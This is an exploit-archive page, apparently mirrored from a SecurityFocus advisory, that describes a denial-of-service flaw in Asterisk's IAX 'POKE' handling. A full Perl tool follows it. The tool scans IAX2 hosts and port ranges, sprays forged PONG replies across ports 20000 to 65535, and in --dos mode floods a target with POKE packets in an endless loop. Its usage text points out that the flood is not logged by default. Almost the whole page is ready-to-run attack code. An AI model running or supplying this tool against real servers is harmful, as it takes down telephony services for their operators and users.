257 lines
No EOL
6.5 KiB
Perl
Executable file
257 lines
No EOL
6.5 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/30321/info
|
|
|
|
Asterisk is prone to a remote denial-of-service vulnerability because it fails to handle multiple 'POKE' requests in quick succession.
|
|
|
|
Attackers can exploit this issue by sending a persistent stream of 'POKE' requests that will consume processor resources and deny service to legitimate users.
|
|
|
|
NOTE: By default, 'POKE' requests are not logged by Asterisk.
|
|
|
|
#!/usr/bin/perl -w
|
|
#udp IAX ping discovery and injection tool
|
|
#Created: Blake Cornell
|
|
#Released under no license, use at your own free will
|
|
#
|
|
# Do not hesitate to show enthusiasm and support
|
|
# and help develop this further.
|
|
|
|
use strict;
|
|
use IO::Socket;
|
|
use Getopt::Long;
|
|
use Net::Subnets;
|
|
use Pod::Usage;
|
|
|
|
|
|
my @target_port = (4569);
|
|
my @targets = ('127.0.0.1');
|
|
|
|
my $result = GetOptions('port|p=i' => \(my $port = ''),
|
|
'sport|sp=i' => \(my $sport = ''),
|
|
'eport|ep=i' => \(my $eport = ''),
|
|
'source|sip=s' => \(my $source = ''),
|
|
'host|h=s' => \(my $host = ''),
|
|
'inject|in' => \(my $inject = ''),
|
|
'dos' => \(my $dos = ''),
|
|
'timeout|t=i' => \(my $timeout = ''),
|
|
'dundi-check|dundi' => \(my $dundi = ''),
|
|
'verbose|v' => \(my $verbose = ''),
|
|
'help|?' => \(my $help = '')) or pod2usage(2);
|
|
|
|
if($help) { printUsage(); }
|
|
if($host) { @targets=@{retHosts($host)}; }
|
|
if($port) { $target_port[0] = $port; }
|
|
if($dundi) { print "DUNDI Option Scan not supported yet."; }
|
|
if($source) { print "Setting of the source IP address is only supported
|
|
in inject mode"; }
|
|
|
|
|
|
if($inject) {
|
|
if($verbose) { print "INJECTION MODE"; }
|
|
if(!@targets) {
|
|
print "\nSet the host ( -h ) option\n";
|
|
return 1;
|
|
}
|
|
for(my $i=20000;$i<=65535;$i++) {
|
|
for(my $j=0;$j<=$#targets;$j++) {
|
|
if($verbose) { print $targets[$j]; }
|
|
injectIAXPoke($targets[$j],$source,$i,0);
|
|
}
|
|
#my($target,$source,$port,$timeout,@args)=@_;
|
|
}
|
|
exit;
|
|
}
|
|
|
|
if($dos) {
|
|
while(1) {
|
|
for(my $j=0;$j<=$#targets;$j++) {
|
|
if($verbose) { print $targets[$j]; }
|
|
dosIAXPoke($targets[$j],4569,$timeout);
|
|
}
|
|
|
|
}
|
|
}
|
|
|
|
if($sport ne '' && $eport ne '') { #defined doesn't work for getoptions
|
|
#devices are always defined
|
|
if($verbose ne '') { print "Scanning Port Range\n"; }
|
|
if($eport < $sport) {
|
|
my $tmp = $eport;
|
|
$eport = $sport;
|
|
$sport = $tmp;
|
|
}
|
|
if($sport < 1) { $sport = 1; }
|
|
if($eport > 65535) { $eport = 65535; }
|
|
if($timeout ne '' && $verbose ne '') {
|
|
if($timeout <= 0) {
|
|
$timeout = 1;
|
|
}
|
|
print "Scanning Ports $sport through $eport\n";
|
|
print "Setting timeout to $timeout\n";
|
|
}
|
|
|
|
@target_port=();
|
|
for(my $i=$sport; $i <= $eport; $i++) {
|
|
push(@target_port,$i);
|
|
}
|
|
sendIAXPokes(\@targets,\@target_port);
|
|
|
|
}else{ #scanning only default port...
|
|
sendIAXPokes(\@targets,\@target_port);
|
|
}
|
|
|
|
sub sendIAXPokes {
|
|
my($targets_ref,$target_ports_ref,@args)=@_;
|
|
|
|
my @targets=@{$targets_ref};
|
|
my @target_ports=@{$target_ports_ref};
|
|
|
|
for(my $i=0;$i<=$#targets;$i++) {
|
|
for(my $j=0;$j<=$#target_ports;$j++) {
|
|
|
|
sendIAXPoke($targets[$i],$target_ports[$j],$timeout);
|
|
}
|
|
}
|
|
}
|
|
|
|
sub sendIAXPoke {
|
|
my($target,$port,$timeout,@args)=@_;
|
|
|
|
if($verbose) {
|
|
print "Trying $target:$port\n";
|
|
|
|
}
|
|
socket(PING, PF_INET, SOCK_DGRAM, getprotobyname("udp"));
|
|
|
|
my $src_call = "8000";
|
|
my $dst_call = "0000";
|
|
my $timestamp = "00000000";
|
|
my $outbound_seq = "00";
|
|
my $inbound_seq = "00";
|
|
my $type = "06"; #IAX_Control
|
|
my $iax_type = "1e"; #POKE
|
|
my $msg = pack "H24", $src_call . $dst_call . $timestamp .
|
|
$outbound_seq . $inbound_seq . $type . $iax_type;
|
|
|
|
my $ipaddr = inet_aton($target);
|
|
my $sin = sockaddr_in($port,$ipaddr);
|
|
|
|
send(PING, $msg, 0, $sin) == length($msg) or die "cannot send to
|
|
$target : $port : $!\n";
|
|
|
|
my $MAXLEN = 1024;
|
|
my $TIMEOUT = 1;
|
|
if(defined($timeout) && $timeout ne '' && $timeout != 0) {
|
|
#timeout of 0 hangs
|
|
|
|
#unanswered requests
|
|
$TIMEOUT=$timeout;
|
|
}
|
|
eval {
|
|
local $SIG{ALRM} = sub { die "alarm time out"; };
|
|
alarm $TIMEOUT;
|
|
|
|
while (1) {
|
|
my $recvfrom = recv(PING, $msg, $MAXLEN, 0) or
|
|
die "recv: $!";
|
|
($port, $ipaddr) = sockaddr_in($recvfrom);
|
|
my $respaddr = inet_ntoa($ipaddr);
|
|
print "Response from $respaddr : $port\n";
|
|
return($respaddr,$port);
|
|
}
|
|
|
|
};
|
|
}
|
|
|
|
sub injectIAXPoke {
|
|
my($target,$source,$port,$timeout,@args)=@_;
|
|
|
|
socket(PING, PF_INET, SOCK_DGRAM, getprotobyname("udp"));
|
|
|
|
my $src_call = "8000";
|
|
my $dst_call = "0000";
|
|
my $timestamp = "00000000";
|
|
my $outbound_seq = "00";
|
|
my $inbound_seq = "01"; #increment by one did he say?
|
|
my $type = "06"; #IAX_Control
|
|
my $iax_type = "03"; #PONG
|
|
my $msg = pack "H24", $src_call . $dst_call . $timestamp .
|
|
$outbound_seq . $inbound_seq . $type . $iax_type;
|
|
|
|
my $targetIP = inet_aton($target);
|
|
my $sin = sockaddr_in($port,$targetIP);
|
|
|
|
send(PING, $msg, 0, $sin) == length($msg) or die "cannot send to
|
|
$target : $port : $!\n";
|
|
}
|
|
|
|
sub retHosts {
|
|
my($host,@args)=@_;
|
|
my @addrs;
|
|
|
|
if(!$host) { return ('127.0.0.1') };
|
|
|
|
if($host =~
|
|
/^([\d]{1,3}).([\d]{1,3}).([\d]{1,3}).([\d]{1,3})\/([\d]{1,2})$/ && $1
|
|
>= 0 && $1 <= 255 && $2 >= 0 && $2 <= 255 && $3 >= 0 && $3 <= 255 && $4
|
|
>= 0 && $4 <= 255) {
|
|
#Check to see if host is valid
|
|
class C CIDR Address
|
|
if($verbose) { print "Setting CIDR Address Range\n"; }
|
|
my $sn = Net::Subnets->new;
|
|
|
|
my($low,$high)=$sn->range(\$host);
|
|
if($verbose) { print "Determined IP Ranges From $$low -
|
|
$$high\n"; }
|
|
return \@{ $sn->list(\($$low,$$high)) };
|
|
|
|
}elsif($host =~
|
|
/^([\d]{1,3}).([\d]{1,3}).([\d]{1,3}).([\d]{1,3})$/ && $1 >= 0 && $1 <=
|
|
255 && $2 >= 0 && $2 <= 255 && $3 >= 0 && $3 <= 255 && $4 >= 0 && $4 <=
|
|
255) {
|
|
#Check to see if host is valid
|
|
IP
|
|
push(@addrs,"$1.$2.$3.$4");
|
|
}else{
|
|
push(@addrs,$host);
|
|
}
|
|
return \@addrs;
|
|
}
|
|
|
|
sub dosIAXPoke {
|
|
my($target,$port,$timeout,@args)=@_;
|
|
|
|
if($verbose) {
|
|
print "Trying $target:$port\n";
|
|
|
|
}
|
|
socket(PING, PF_INET, SOCK_DGRAM, getprotobyname("udp"));
|
|
|
|
my $src_call = "8000";
|
|
my $dst_call = "0000";
|
|
my $timestamp = "00000000";
|
|
my $outbound_seq = "00";
|
|
my $inbound_seq = "00";
|
|
my $type = "06"; #IAX_Control
|
|
my $iax_type = "1e"; #POKE
|
|
my $msg = pack "H24", $src_call . $dst_call . $timestamp .
|
|
$outbound_seq . $inbound_seq . $type . $iax_type;
|
|
|
|
my $ipaddr = inet_aton($target);
|
|
my $sin = sockaddr_in($port,$ipaddr);
|
|
|
|
send(PING, $msg, 0, $sin) == length($msg) or die "cannot send to
|
|
$target : $port : $!\n";
|
|
}
|
|
|
|
|
|
sub printUsage {
|
|
print "$0 -h remoteorigin.com \n\t\tScans remoteorigin.com on
|
|
default port of 4569\n";
|
|
print "$0 -h remoteorigin.com -sp 4000 -ep 5000\n\t\tScans ports
|
|
4000 through 5000 on server remoteorigin.com\n";
|
|
print "$0 --source remoteorigi.com -h 127.0.0.1
|
|
--inject\n\t\tInjects Forged Poke Replies to 127.0.0.1 from
|
|
remoteorigin.com\n";
|
|
print "$0 --dos\n\t\tThis will continually send IAX Poke
|
|
packets. This will eat up CPU cycles and isn't logged by default\n";
|
|
exit;
|
|
} |